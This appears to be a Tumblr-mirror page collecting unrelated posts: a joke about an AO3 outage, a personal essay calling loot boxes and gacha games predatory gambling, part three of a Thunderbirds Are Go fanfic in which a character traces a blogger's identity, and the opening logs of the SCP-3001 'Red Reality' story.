Tumgik
#actually though don’t try logging in or accessing the site cause it only creates more requests and hurts the website
ineedahugtm · 1 year
Text
Dear diary,
It’s been approximately 2 hours since I’ve found out that ao3 has been down. I don’t think I can go on for very much longer. I keep typing the url into the address bar on safari before realizing that it’s still down and it’s only been 2 minutes since I last tried.
May god help us
12 notes · View notes
lizzy-frizzle · 4 years
Text
I’m going to start this by saying, I have bias. Everyone does. I do not intend for this to come off as “the thing you like is bad”, but moreso “the corporation that controls the thing you like is manipulative”.
My background; I am a 26 year old trans mom, I have a history with addiction, particularly gambling, and spend most of my time playing video games. I have gone to college for about 3 years for my psychology degree, and while I do not have my degree, I have been studying psychology for roughly 12 years. This is to say, my views will reflect this background. Just because I present this information like I do, does not inherently mean I’m right, though it also doesn’t mean I’m wrong. Try to view things with a critical mind, and know that most topics have nuance.
Ok, so lootboxes, booster packs, gacha games, all of these are gambling. This is not really an argument. You are putting money into a service of sorts, and receiving a randomized result. Be that a fancy new gun, that same boring legendary you have 5 of, or that final hero you’ve been trying to collect. You don’t know the outcome before you give your money. As defined by the merriam-webster dictionary: “Gambling; the practice of risking money or other stakes in a game or bet”
You are risking your money in not getting an item you want. There are ways this is handled acceptably, and ways this is handled poorly. Gambling is also illegal to people under 21 in a lot of places, but places online aren’t quick to tell you why. I don’t have any sources because every source requires a paywall to get any information, but pulling from my own personal experience and what I learned in college, it’s because children are very impressionable. I say “I like pokemon” and suddenly my 2-year old can’t go anywhere without her pikachu. I remember distinctly playing poker with my mom and her friends when I was 12. When you normalize gambling, what it does is lower the risk aversion of gambling. You are less likely to see a threat in playing that card game, because when you are that young you have no concept of money. You don’t know what a dollar is, so why not throw it away so you can have fun. This is...I hesitate to call it fine, but it’s mostly harmless. The issue is with children and their lack of knowledge of money. When I grew up and got a job, it’s a lot harder to tell my brain, “hey, don’t spend that money, you won’t get it back and you won’t get what you want.” Because my brain just acknowledges the potential for what I want. I want to buy the booster pack so I can have the potential to get that masterpiece misty rainforest. I want to buy that diamond pack so I have the chance to get the cute hero. I want to buy that lootbox so I can get the battle rifle that does a cool effect. These are harmless concepts, but very dangerous.
Make no mistake, companies know how psychology works, and will use it to their advantage. MatPat from game theory states that companies have even go so far as to have systems in place that change the odds as you’re losing, and monitor your skill level to put you up against harder opponents, to see the better weapons and go, “Oh I want that!” and entice you to buy more lootboxes. As it turns out I found an article covering what he was talking about, Activision had actually acquired a patent to arrange matchmaking to do just that [x], and the article says it’s not in place, but my trust in companies is not high enough to actually believe them.(honestly, matpat made a 2-part video series about lootboxes, and I’d recommend watching them)
So, companies are trying to manipulate you to buy more gambling products. There’s proof of it. It’s also more blatantly obvious in games like Magic the Gathering, where they release fancier versions of cards at rarer probabilities. To better explain it, from a collector’s standpoint, you want the fancy card cause it has value, it has value because it’s rare, rarer than the other versions, so if you’re on the lower end of the income ladder you buy a pack, or two. After all, you could get lucky and get it. On the higher end of the income ladder, you buy the card outright and hoard it. Maybe sell it off later if you notice the price goes down. From a player perspective, you see a card is being used by tournament players, you want to win more games, so you want those cards, which encourages you to buy products and try to get those cards. That’s predatory behavior. It’s predatory from the company’s perspective because that poor person might not be able to afford the card outright, but $5-$10 isn’t much, plus they always entice you with that Chance. They also further this desire for the cards by making it limited runs, such as the secret lair packs, if there’s a low amount purchased and it’s made to order, or worse, if they limit the order capabilities themselves, that drives up the value, and provides further incentive to buy the cards and packs. This not only creates an impossible barrier between the poor and the rich, but also heavily encourages people buy their gambling pack than people would have in other conditions.
For the record, I love magic the gathering, I’m not saying the game itself is bad, this is just a VERY predatory marketing tactic.
Let’s switch gears. Gacha games. I play AFKArena, because like I said, I have a gambling addiction and cannot stop myself. In AFKArena, you collect heroes, and battle with them in various ways. If you collect more of similar heroes you can rank them up. If I’m to believe what I’ve heard, it sounds like this is pretty common for gacha games. So what makes it bad. In AFKArena you use diamonds to summon heroes, now, you can acquire diamonds by beating specific story chapters, logging in every day, random limited time events, or paying for them with real money. AFKArena hero drops don’t seem that bad compared to the free diamond amount they dish out, which has resulted in me not spending all that much money on it, all things considered ($20 over 2 years). I believe that for a mobile game like this, that’s fair. I get way more enjoyment out of the game than I do most $60 games, so it balances out. However, this isn’t the case for every gacha game, and my trust in companies, as previously stated, is very low. The issue lies in them making the rates for good heroes so low that you HAVE to spend money on the game to really get over a roadblock of sorts. I do think that there is this issue in my game and I just didn’t notice it, someone with a lower tolerance or patience might absolutely have the incentive to drop hundreds of dollars on the game over a month. There are people of all different flavours, and it’s important to keep that in mind when discussing these topics, just because a marketing technique doesn’t work on you, does not mean it doesn’t work on anyone. After all, they have those $100 packs for a reason, you might not be that reason but someone is. That’s predatory.
I feel like I’ve gotten off track, let’s get back on the rails. Where was...gambling...predatory…ah, kids. So my biggest issue, is that Magic the Gathering is marketed towards 13 year olds. Not directly, but the packs say 13+. AFKArena and any mobile game for that matter, can be downloaded by anyone with a phone for free, with minimal mention that there’s microtransactions. AAA title games like Destiny 2, Overwatch, Fortnite, etc. are probably the worst offenders. A kid spent $16,000 of his parents money on fortnite in-game purchases, and that’s not the only time this has happened [x] [x] . More often than not, what happens is, the kid wants to play a video game, like halo on xbox, or destiny, or something, they ask their mom for their credit card, and the system saves it. I mentioned before that kids do not have a concept of money or its value, so giving kids unlimited access to the credit card is going to result in this kind of thing happening. I’m not blaming the parents for not being hypervigilant, sometimes you are really busy, or disabled, or whatever the reason, and you don’t notice the system just saved your card. I’m not blaming the kids cause their brains are literally underdeveloped. I blame the corporations, because they make the process as easy as possible to prey on kids and people with gambling addictions. (as a personal anecdote, I found that if I want a magic card in MtG:O, I’m way less likely to try and buy it if I have to get up and get my card, I’d recommend not saving your card if you suffer from gambling/addiction problems)
So after all of this evidence, how can anyone still view these things as anything but predatory? The answer is simple. You’re told they aren’t. Businesses spend hundreds of thousands of dollars on really good marketing, and public relations. I tried to google why gambling is illegal for people under 21, and got nothing, I got a couple forums asking the question, and a couple religious sites saying it’ll make them degenerates. I try looking up sources to prove the psychology behind these concepts, but they are locked behind paywall after paywall after paywall. Businesses and capitalism has made it so incredibly hard to discover the truth and get information you need, and it’s on purpose. They want you to trust that that booster pack is a good idea. They want you to spend money on lootboxes (look at all the youtubers that shill out for raid shadow legends, or other gambling games to their super young fanbase [x]). They want you to lower your guard and go, “well, it’s a video game, how can it be predatory?” “it’s a card game with cute creatures on it, surely it’s not that bad”
But it is. So why did I make this post? I dunno, my brain really latched onto the topic, I see so many people enjoying gacha games, but I’m worried that it’s going to ruin lives...I just want everyone to be informed and critical of what is going on.
230 notes · View notes
gumnut-logic · 5 years
Text
V. T. Green (Part 3)
Title: V. T. Green
Part One | Part Two | Part Three
Author: Gumnut
1 - 5 Sep 2019
Fandom: Thunderbirds Are Go 2015/ Thunderbirds TOS
Rating: Teen
Summary: “Did you discover this, Brains?” He frowned. There was something familiar about this. Maybe they had discussed it recently.
“Oh, no, this is V. T. Green. The man is brilliant.”
Word count: 3174
Spoilers & warnings: None.
Timeline: Standalone
Author’s note: I has a lurgy. This is being typed as I cough my brain silly. Very annoying. Nutty hates being sick. Sick of being sick. I hope my writing does not suffer because of it (though last time I had a lurgy I wrote Prank War, so you never know what might happen :D )
This is one that I have been meaning to write for some time. I hope you enjoy it :D Many thanks to both @scribbles97 and @vegetacide for all their wonderful help with this.
Disclaimer: Mine? You’ve got to be kidding. Money? Don’t have any, don’t bother.
-o-o-o-
Scott eyed his eldest brother as he slunk into the kitchen. A little pale, the man had finally made it out of his uniform into jeans with his usual red flannel draped over a bare chest. By the way he was moving, Scott could tell he hadn’t taken his painkillers.
A sigh. “I know you hate the pills, Virg, but you can’t tell me you prefer to be in pain.”
“I prefer to be able to think.”
“Pain hampers healing.”
“Yes, Mom.”
Scott’s lips thinned. “Pills or Grandma. Your choice.” Sometimes the big guns were necessary.
“Scott...”
“Hey, if our roles were reversed, what would you do?”
The glare wilted along with his brother’s shoulders. That prompted a grimace and tensed up Scott’s shoulders in turn. Goddamnit, Virg. He stood up from where he was seated at the breakfast bar and striding across to his brother, gently steered the man to a seat at the table. “Sit down and stay put.”
That prompted another glare, but Scott ignored it, darting up the stairs and beyond into the residential levels and Virgil’s room. Sure enough, the bottle sat beside his bed, seal still intact. A grab and a jog back down to the kitchen...
...and Virgil had his head buried in the refrigerator.
He dumped the pills on the bench. “I thought I told you to sit.”
“I’m hungry.”
“Sit down and I will get you some dinner.”
“I can make my own dinner. I can at least do that.”
“Virgil-“
“I’m fine, Scott, just leave it.” A pair of frowning brown eyes glared at him over the fridge door.
Scott mirrored that frown. You want stubborn, just try me.
Virgil must have seen it in his expression, because the glare intensified.
“Sit down, Virgil.”
“Is that an order, Commander.”
“If necessary.”
The butter was yanked out of the refrigerator and thrown onto the counter with a loud clatter. The bread joined it and tumbled as it hit the laminate. A jar followed that would have fallen on the floor and smashed if Scott didn’t reach out and catch it. “What the hell? What’s wrong with you?”
“Just making myself some dinner.”
“Sit down!”
“I am fully capable of making myself dinner!”
“Sit down!”
“Scott-“
“Damn it, Virgil, if you don’t sit down, I will make you sit down.”
That arched an eyebrow. “You could try.”
“Either you sit down and stop being stupid, or I’ll get Grandma in here and you can discuss it with her.”
A plate hit the stone flags and smashed, clinking shards scattering across the floor.
Scott jumped. Virgil stared at him for a solid moment before crouching down and picking up pieces of crockery.
Scott didn’t miss the flinch of pain the movement caused.
For god’s sake. “Virgil-“
“Leave it, Scott, just leave it.”
There was something in his brother’s voice, something hurt.
“V-“
“For Christ’s sake, what do I have to say to you? Just leave me the hell alone!” Broken crockery was shoved into the kitchen bin. Virgil grabbed a broom and swept up the mess one-handed without saying another word. The butter, bread and jar of spread were thrown back into the refrigerator and without a glance back, his brother hit the stairs and left.
Scott stared after him.
The bottle of pills sat alone on the bench.
-o-o-o-
“J-John, have you heard of V. T. Green?”
The astronaut turned around at Brains’ voice, the expected hologram flickering into being. “Good evening, Brains.” A hand reached out and shifted two situations to Resolved. A flick of his wrist and another landed in Not Required. “Who is V. T. Green?”
The engineer sighed. “I thought that at least y-you would know him. The m-man is a b-brilliant engineer.”
“Sounds more like Virgil’s wheelhouse.” He flicked a finger at the tropical low growing in strength just north of Western Australia and flagged it for more regular monitoring.
“Virgil h-hasn’t heard of him either. Wh-Which I find strange. I h-have been following Green’s b-blog for s-some time and I b-believe his w-work could be very useful for International Rescue.”
Now that gave him pause. John couldn’t recall Brains ever saying such a thing about any other scientist...well, except Moffie and that was for a completely different reason. “That’s high praise coming from you.”
“He d-deserves it. Have a look at this polymer.”
A series of equations appeared at John’s elbow. A glance soon became a frown of concentration. “Am I reading this correctly? Self healing?”
“Y-Yes. It w-would be invaluable for the Thunderbirds.”
A pause. “So, you want to contact this guy? Have you spoken to Scott? Kayo?”
The engineer tilted his head to one side. “I h-have attempted to gather some inform-mation, b-but haven’t had much success. I w-was hoping you m-might have b-better luck?”
John turned and eyed his friend. “You want me to run a check on him?” In other words, hack his blog and find out as much as possible.
“So I can g-go to Scott with enough d-detail to reassure him.”
Now that was a point. Scott was notoriously paranoid when it came to IR’s security. As bad, if not worse than Kayo. Brains was right to build a solid case.
“I can do. How much information do you need?”
“W-Whatever you can find.”
“FAB.”
“Thank you, John.”
“Not a problem.”
His hologram blinked out.
-o-o-o-
Scott couldn’t help himself. He followed his brother up the stairs to his room. What the hell was wrong with Virgil? It was so unlike him to get so angry with so little provocation.
Debrief had been nasty. Alan was defiant and angry and hurt. Without Virgil there to balance the scales, things had gotten out of hand quickly, the whole meeting devolving into a shouting match. Even John had started yelling.
Alan had stormed off, Gordon chasing after him.
Scott had been so angry. Virgil’s life had been endangered and all for a battle of wills. Grandma’s hand on his arm and her soft voice had snapped him out of it.
Damn.
He hated it when his brothers were injured. It wasn’t major, Virgil’s injury would heal, but still, all because Alan did something stupid.
He stood outside his brother’s closed door for a full two minutes before he raised his hand to knock.
“Scott? We have a situation.” John’s voice was soft.
He let his arm drop.
He would have to speak to Virgil later.
Apparently.
-o-o-o-
It took him another three hours, part of which involved sending Scott out to pluck yet another climber off the side of a mountain, before John had a chance to focus on the task Brains had requested.
The site itself appeared simple. Admittedly, John was a little distracted at first by its content. Brains was correct. The author definitely was someone to be admired. Admittedly, John’s knowledge of engineering wasn’t as extensive as Brains or Virgil’s but there were definitely some very elegant solutions presented on the site. A glance at the source code, a dig for the originating IP address and John easily found the site’s host in Silicon Valley, California. He launched a data miner and pulled the site logs searching for IPs that had accessed the site for publishing in an attempt to locate the author.
That’s when he hit a snag. According to the logs, each post had been created and posted from a different address. Sure, this was possible with an IP cloak, but it shouldn’t be possible to avoid his hack of that cloak.
He tracked one address through China to Russia and back out again to Spain, of all places, before he lost it at an exchange in Portugal. Another fed through Indonesia, six different servers in Japan, only to jump to a commercial satellite and claim it came from the Moon. John followed six more addresses before he discovered the layered encryption and the redirection code hidden under it.
“Oh, he’s good. Very good.” The logs themselves had been encoded to redirect the very same kind of hack John was attempting.
It took him another half hour to break the code that kept trying to lead him off on a wild goose chase.
And another hour to trace the server path through half the planet and then some - it did actually go via the moon, using some ancient tech not destroyed by the meteor shower that took out Moonbase Alpha.
By the time he finally tracked down the origin of the posts, John was beyond impressed.
When he discovered the identity of V. T. Green, he understood why.
It was so obvious, he should have known.
-o-o-o-
Dear V.T. Green. I represent a good company...
Hey, V.T. I am totally loving your stuff. You should go into business...
Doctor Green. Our university is very interested in gaining your services...
Sir, I need your help...
That last one caught his attention initially, but it devolved into a blatant scam two paragraphs in. It left him depressed.
He let his tablet fall onto his desk and his head into his one working hand. He had no idea what to do about all the requests for his assistance. Six different universities plus three other thought centres had replied, all ever so complimentary of his intellect. One laugh had been the fact that the Denver School of Advanced Technology was one of them. The bonus had been the admirer was a lecturer who had hated his guts.
Part of him wanted to reply and rub his face in it.
The tablet pinged again and Virgil was tempted to chuck the whole thing in the trash.
Message from Dr HH.
Virgil stared at it for a good minute before he inevitably touched the screen to open it.
Dear Doctor Green.
Why did half of them think he was a doctor? He had never claimed to be.
I have written you before, but I do not trust the vagaries of the internet and I feel the need to make sure you receive my request.
Virgil sighed. He was going to have to say something soon. This was unfair to Brains.
The letter went on to reiterate Brains’ suggestions regarding the polymer and reinforce the impression that they would be able to save lives.
Save lives.
It was what he did. And yes, that polymer could do that, as part of the Thunderbirds, but also if he released the rights to the design. Space and underwater habitats sorely needed the tech.
Of course, he had yet to run tests. Nothing practical had been experimented. It could all be a big hype over a big failure.
Another sigh and he closed his eyes. He hadn’t eaten, but he wasn’t hungry any more. His shoulder and arm hated him and his pills were down in the kitchen. To reach them, he would have to navigate the house and hope he didn’t run into any family members. He just didn’t feel like...explaining himself.
Perhaps he could crawl back into bed and find sleep again.
He stood up...and the emergency alarm cut off everything.
His response was reflex and he was out the door before processing another thought. He hit the elevator before he remembered he was off rescues, the car carrying him down to the comms room and dumping him there.
Damn.
But to be honest he really couldn’t not find out what was going on. He had a need to know where his brothers might be sent, no matter how it grated that he couldn’t go with them.
So, with some reluctance, he slunk around the corner into the comms room, forcing a positive gait across to the lounge where he parked himself, spine straight.
Gordon eyed him from across the other side of the circle, an eyebrow arching. Scott rose from behind their father’s desk and jogged down the steps and sat next to Virgil.
Virgil blinked. A flash of blue, a frown and thinned lips greeted him.
Damn. That would have to be fixed sooner rather than later.
Alan was the last to arrive, darting in from the kitchen and sitting beside Gordon. His eyes tracked across Virgil, but didn’t acknowledge him.
Out the corner of his eye, he saw Grandma frown.
“What’s the situation, John?”
“This is a big one. Remember the Grand Sequoia Dam?”
“A little hard to forget.”
“They are reporting fractures in the dam wall and they are claiming it has to do with our hasty repairs last time.”
“What?” Virgil shot to his feet. “I checked and double checked the seal. I even went back and conducted stress testing. There is no way that dam wall could be failing because of our repairs. The nanocrete is stronger than the entire wall itself.”
John stared at him a moment before continuing. “Whatever the cause, they are claiming the wall is failing. An evac order has gone out to the town below, but they are concerned there will not be enough time. They’ve called us, and Virgil in particular, to assist.”
A frown and Virgil was pulling up scans and diagrams of the dam. Their assessment was correct. The wall was failing. A frown. It shouldn’t be. The volume of water currently pressing on it simply didn’t have the energy to create the situation. A flick of his hand and he spun the view. For this to happen there needed to be pressure from this angle with a much higher amplitude.
“Virgil is injured.” It was Grandma who broached the obvious.
“I’m going.”
That sprouted a whole array of glares.
He straightened where he stood. “I need to know what is causing this.”
“You can do that from here.” Of course, Scott would object.
“No, I prefer to be onsite.”
“You’re injured.”
“No kidding. I will ride in Two with Gordon.” He didn’t miss the sudden widening of Gordon’s eyes at that comment. “Nothing energetic.” Scott was still glaring. “There are some things that have to be seen in person.”
Scott’s lips thinned. He was pedantic about injured brothers, as was Virgil, but there was something about the situation, something odd, and it was Virgil’s reputation at stake here. Due to the use of the nanocrete, a proprietary substance unique to IR, he had signed off the safety on the dam, and it was safe.
But not now.
“I’m going.”
Brains, who had been quiet up to this point, rose slowly from where he sat. “I agree with Virgil.”
“Brains...” Grandma was admonishing.
“This shouldn’t b-be happening.” He pointed at the crack in the dam. “The structure is d-designed to w-withstand strain far b-beyond what it is currently under. The n-nanocrete cannot be responsible, yet they are accusing us. Why?”
Scott stared at Brains. “You think this is targeted?”
“It is possible.”
“The Hood?”
“Unknown, but I do think we n-need Virgil onsite for this. He has the civil knowledge n-needed.”
“Why can’t you go?” Alan piped up, still not paying any attention to Virgil.
Brains blinked and frowned at the young astronaut. “Y-you are aware that V-Virgil is the more qualified engineer in this instance?”
“What?”
It was Gordon who rounded on his little brother. “You been living under a rock, bro? Virg is the man when it comes to this stuff. You know that.”
Blue eyes frowned. “I just thought Brains could go since Virgil is injured.”
“I could, b-but Virgil’s knowledge is greater.”
Finally, Alan turned to him, but Virgil no longer had the time. “We need to get moving, that dam is not going to hold much longer.”
Scott shot to his feet. “Thunderbirds are go.”
-o-o-o-
It was odd going out on a rescue in Two, but not flying her. Virgil’s arm was still in a sling and strapped up, curled against his chest. Brains had made sure it was secure after helping him into his uniform. It hurt, but it was necessary.
The co-pilot’s seat had just a slightly different view.
Gordon launched her just as smoothly as Virgil would have. Alan sat quiet behind the both of them. As soon as they were airborne and stable, the young astronaut excused himself, muttering something about seeing to the pods.
The moment he was gone, Gordon didn’t waste any time poking the bear.
“What’s with you and Alan?”
“Nothing.” He really didn’t want to go into it.
The eyebrow arched at him was so similar to what Virgil would have done if their roles had been reversed, he almost smiled.
“Sounds like a pile of horse dung, but I’ll let you go with it.”
Virgil turned and stared at his brother.
Gordon didn’t react. “You know you scared the shit out of him, don’t you?”
“What?”
“He screwed up and his big brother got hurt.” Gordon flicked his gaze between the instruments and Virgil. “Scott reamed him out big time at debrief. You weren’t there and he really let rip.”
“Shit.” It came out under his breath.
“John lassoed him instead, but he didn’t respond as fast as you would have. Alan was kicking himself before that. By the time Scott had finished with him, he was on the verge of never going out on a rescue ever again.”
“He made a mistake. We all make mistakes.”
“He made a dick move, Virg. He didn’t listen to you or Scott and thought he knew better.” A snort. “I should know. Been there, done that, learnt the hard way.” A smirk. “First rule of International Rescue: If Virgil says it is, it is.” The smirk became a grin. “And woe be he who thinks otherwise.”
“Gordon...”
“I’m not kidding.” And the grin vanished, replaced by genuine honesty. “You know what you are talking about. You’re good at what you do.” A glance back at his flight path. “He should have listened to you.”
Virgil stared at his little brother. It took him a moment to gather himself. “Thank you, Gordon.”
The aquanaut shrugged. “Eh, I learnt the hard way, but I learnt. Anyway, you should probably talk to Alan.”
Virgil shifted in his seat and his shoulder complained loudly. He stared down at his feet. “Yeah, I should.”
There was silence in the cockpit for a bit. Virgil was caught up in what he should say to his littlest brother and Gordon quietly eyeing him.
The silence was obviously too much for Gordon. “So, who is this V. T. Green Brains keeps raving about?”
Virgil flinched; the question completely unexpected.
Gordon frowned at him. “What? What do you know about him?”
“Nothing.”
An amber blink. “Bullshit, Virg, you’re looking guilty as. What do you know? Scott said Brains was interested in inviting the guy to the island.”
Virgil’s head shot up and his shoulder screamed at him. Ow.
Gordon’s frown tried to cleave his face in half. “What the hell, Virgil? If you know something, why haven’t you said anything? Brains is going nuts trying to find this...guy.” And Gordon was staring at him in shock. “Oh my god.”
Virgil glared at him. “What?”
“It’s you.”
-o-o-o-
End Part Three
Part Four
23 notes · View notes
let-them-eat-rakes · 5 years
Text
RED REALITY (part 1)
(my longest post yet.)
Item #: SCP-3001
Object Class: Euclid
Special Containment Procedures: To prevent further accidental entries into SCP-3001, all Foundation reality-bending technology will be upgraded/modified with multiple newly developed safeguards to prevent Class-C "Broken Entry" Wormhole creation. While knowledge of SCP-3001 is available to personnel of any level should they wish to learn about it, research and experimentation with SCP-3001 and its associated technology is strictly limited to personnel of Level 3 and above, with special clearance designation granted from Sites 120, 121, 124, and 133.
Description: SCP-3001 is a hypothesized paradoxical parallel/pocket "non-dimension" accessible through the creation of a momentary Class-C "Broken Entry" Wormhole.(1) While believed to be an infinitely extending parallel universe, SCP-3001 is almost completely devoid of any matter and has an extremely low Hume Level of 0.032,(2) contradicting Kejel's Laws of Reality with the relation between Humes and spacetime. This phenomenon causes matter inside it to decay at an extremely low rate, and damage that would otherwise prove fatal does not impede any biological/electronic function; simulations suggest an organism can lose more than 70% of their body's tissue and still operate normally, as long as at least 40% of the brain remains. However, prolonged exposure will cause said matter to gradually approach SCP-3001's own Hume Level, resulting in severe tissue/structural damage as the matter's own Hume Field begins to disintegrate.
SCP-3001 was initially discovered on January 2, 2000, at Site-120, a facility dedicated to testing and containing reality-bending technology. Dr. Robert Scranton and his wife Dr. Anna Lang were Head Researchers at Site-120, and were developing an experimental device, called the "Lang-Scranton Stabilizer" (LSS).(3) Dr. Scranton was transported to SCP-3001 after unexpected seismic activity damaged several active LSS in Site-120 Reality Lab A.
Initially presumed dead, Dr. Scranton has survived in SCP-3001 for at least five years, 11 months, and 21 days. During this time, he was able to record his experiences and observations within SCP-3001 through a somehow still functioning LSS control panel, which was also brought into SCP-3001 with him through the Class-C "Broken Entry" Wormhole. These recordings were later recovered upon the panel's sudden return, an unexpected side effect from testing improved reality-bending technology; these logs are the basis of SCP-3001 study. Despite new technologies being developed, retrieval and re-integration of Dr. Scranton has been unsuccessful. His current physical and mental states, if he is still alive, are unknown. [Further information on Dr. Scranton's possible retrieval is under Ethics Committee review.] Transcripts of Dr. Scranton's logs are below.
[No discernible/coherent dialogue can be heard from Dr. Scranton for the first eight days. He cycles through periods of panic, confusion, and anger throughout, and it seems he was attempting to navigate SCP-3001 to find a way out. He finally moved close enough to the recording log on the eleventh day, though did not notice it was operating for several more hours.]
Name, Robert Scranton. Age, 39. Birthday, September 19, 1961.
Favorite color, blue.
Favorite song, "Living on a Prayer."
Wife… Anna…
Anna…
Name, Robert Scranton. Age, 39. Birthday, September 19, 1961.
Favorite color, blue.
Favorite song, "Living on a Prayer."
Wife, Anna. She has green eyes. I love her very much.
Name, Robert Scranton. Age, 39. Birthday, September 19, 1961.
Favorite color, blue.
Height, 178 cm.
Weight, 85 kg.
Wife, Anna. Anna, I'm sorry.
Name, Robert Scranton. Age, 39. Birthday, September 19, 1961.
Favorite color, blue.
My wife's name is Anna. We got married August 12, 1991.
I hope she got out okay.
Please let her be all right, please let her be all right.
Robert, Scranton. 39. Anna, blue, wife. Please… please, God, please…
Anna… Anna… Anna bo banna… Anna bo banna…
What the… what the hell is that? [It is assumed at this point Dr. Scranton noticed the flashing light of the recording module.]
What the fuck, this thing's actually recording?
[Metallic clang heard.]
[Voice is highly agitated and panicked.] My name, is Robert Scranton. Yeah, yeah, my name, is Robert Scranton, former researcher at Foundation Site-120. It has been… I don't know, actually, I… I can't remember. I… I estimate it's been ten days, but, I-I-I don't, I can't… Oh God, can anyone hear me?! I-I-I don't know what's happened, I-I don't know where I am, and-and, please, please is anyone there?! Hello?! Anyone?! ANYONE?!
No one can hear me. Oh God, oh God, oh God. Fuck, fuck, fuck, fuck, FUCK.
Why the hell is this thing even working, it can't be working, it SHOULDN'T be working, so what the hell?! I need to — God, I need to, I need to… see, how… long can I talk here, I think there's a-a-a cap or something on the recording log, and I-I-I can't see anything, I can only see the red light blinking on and off, I can't see any of the switches next to it…
I'm really hungry.
Thirsty, too. I think I should be dead from dehydration by now, but… I don't know.
Hi, little red light. Can you talk to me? Can you talk to… Anna, for me? Hello?
I found the controls.
Two weeks, three days, forty-seven hours, and fifty-eight minutes.
Two weeks, three days, forty-seven hours, and fifty-eight minutes.
Two weeks, three days, seven hours, and fifty-eight minutes.
Two weeks, three days, seven hours, and fifty-eight minutes.
Oh… Jesus.
ERROR WITH PLAYBACK, ERROR WITH PLAYBACK. ERROR WITH PLAYBACK.
Wherever the hell I am, I'm pretty sure now that… I don't need to eat to stay alive. It hurts… a lot, but… at this point I don't think I'm gonna die… So… I'm gonna… I'm gonna take my time… I guess. I… Maybe some sort of miracle will happen and I'll get out. Heh. Keep dreaming, Robert. Yeah, I'm… I'm tired, I'm gonna sleep.
Three weeks, four days, nineteen hours.
I have a picture of Anna in my pocket. I almost forgot. Little red light, let me see her face, please? Just a little bit, I just… I just want to see her a bit.
Hi, Anna, I'm still here, I'm still here. I'm coming back, okay?
Two months, four days, three hours.
… Hi. Robert here. Yeah, I-I haven't really recorded much to hear in the past few weeks. Ha. Hahahaha… Hahaha… huh… huh…
Sorry, gotta keep it together. Breathe.
I've been… I've been busy. Trying to learn more about the place I'm in. My prison. My kingdom all my own. Heh, King Robert. God, I stink. Is there even air in this goddamn place? Stinky King Robert, king of GODDAMN NOTHING FUCK.
…Sorry, sorry. I, I gotta keep this professional. I'll… I'll come back when I'm feeling rested.
… Okay, here goes. [Inhales then exhales deeply.]
My name is… Robert Scranton. I am a former Head Researcher of Site… 120, a Foundation facility dedicated to studying various reality-bending SCPs, for the purpose of developing more advanced countermeasures towards such threats.
For the last… red light, speak to me,
Two months, eight days, sixteen hours.
What red light said. I have been trapped in what I believe to be an empty pocket dimension. Alone. Yeah… alone. All alone.
I'm calling this place SCP… I don't know, I can't remember where we are, screw it. I don't know what's happened in the past… red light, please, again.
Two months, eight days, sixteen hours.
But… no one else is around to argue, and at this point… I'm just talking into this control panel to keep myself together. I… I need to keep a record. There might be some poor bastard in the future who ends up like me, and… if this ever actually makes it out… maybe, maybe I can help stop that from happening. That's all I have going for me right now, and I really need something to go for, hahahaha…
…So, yeah, Robert… Scranton… documenting a new SCP for… future research purposes. That'll have to do. Here we go!
- Close.
Two months, eleven days, ten hours.
Item number, SCP I don't fucking care.
Object Class, Euclid, I guess, but I don't know, I might update this in time. I need to explore more.
Special Containment Procedures, god I sound so much like a shrink right now… Um… I don't know if we could… contain wherever I am. It's… definitely not on Earth. To be honest I don't know where it is. I… I think it has do something with the Stabilizer prototype… I'll explain that more later. Okay… um… yeah, wherever I am, I don't think it can be contained much as… created. No, no, that's not the word I'm looking for. Um… entered. Yeah, entered is better. I came into this place because of some really bad reality-bending accident and… no, no, Robert, don't be like that yet, you don't know if there's no exit yet. Ooooh… livin' on a prayer… halfway… there. Ahem.
Two months, eleven days, eighteen hours.
So… wait, no, Description, Robert, stick to the format… This place… It's some sort of reality gap, I think. It's dark. Really dark. As in, this little red light that shows my words are actually being recorded is the only visible light in this entire place. I can't see my hands, and I can barely see the control panel here. I've had to basically use the light as a center, and remember how many steps I take and in which direction. I haven't gone past a hundred yet. I'm too… I'm too scared to. Heh. I wonder if my hair is turning white, right now? I can't even see what color it is anymore. Speaking of which, my head has been a bit itchy recently. If I don't concentrate on it, it's fine, but I feel this… tingling all over my face. I'm not sure why.
Two months, fifteen days, four hours.
Okay… hoooo… I-I need to relax for a minute, Jesus, god, shit. Holy… shit, shit, shit… I… just discovered a new property of this place. All this time, I've been thinking I might be walking on… some sort of… flat ground, if you will. I kept eye contact with little red as far as I could see, and it seems I could walk in a straight, flat path. Jesus, my head is buzzing right now, I think the adrenaline is still kicking… But, if my hypothesis is correct, and this really is some sort of reality… void, then there shouldn't be anything to walk on. Now that I think about, the whole time I've been in here, it's felt like… I'm walking, but I'm also swimming through something. And this something is thick, and form-fitting, it has this… pressure, which I know isn't the correct term, but goddamn it, this place makes no damn sense and I'm doing my best to understand it, okay?!
God… Sorry.
So, the best analogy I can come up with is… it's like I'm walking through really thick black gel. There's enough tension to keep me on a… "surface", but if I… imagine myself pressing down hard enough, I can descend. Wait. Wait, wait, wait, wait, wait, I think… I think I need to test this more, I'll be back.
Two months, seventeen days, two hours.
Navigation is largely affected by… conscious impulses to travel in a certain direction. So, this definitely isn't a complete reality gap, at least according to mine and Anna's theories. If-if it were I wouldn't have been able to move at all, since space wouldn't have existed. Holy shit, okay, okay, this makes a lot more sense than it did before, great, great job, Robert, you're getting there. …Come to think of it, I should've realized that sooner when I was able to move in a flat plane to and from little red. It also explains why I'm not dead from dehydration or hunger yet, time barely passes in here. Okay yeah, so, I stood right next to little red, and went straight… "down." Okay, from here on out, imagine little red as the origin of a 3D space. I went straight… down, right, yeah, and then… and then I was then able to come back "up" to little red again. I've also been able to "fly" above red. Movement in here is slow, like I said, gel analogy, best I can describe it by.
Two months, twenty-two-days, three hours.
Reporting back for another update, red, SIR! Hahaha, come on red, lighten up. Ha! Pun not intended… Come on red, crack a little smile, it's funny!
… Fine, whatever. Ahem.
This place still seems like it barely follows Kejel's Laws of Reality Parameters. And by barely, I mean, really just barely. I'm pretty sure my math is right, but… hold on, I'm gonna check again…
Jesus. Yeah, yeah, pretty sure it's good still. Okay, this place… if we're using the standard Hume scale, I'm pretty sure I'm in a reality where the Hume Field is… point zero… four… ish. Yeah, really, really, really fucking low, so… Like I said above, space-time exists on a very minuscule scale, so my biology is not getting shot to hell and back because of any malnutrition, but that also means… I… I'm actually not sure what that also means…
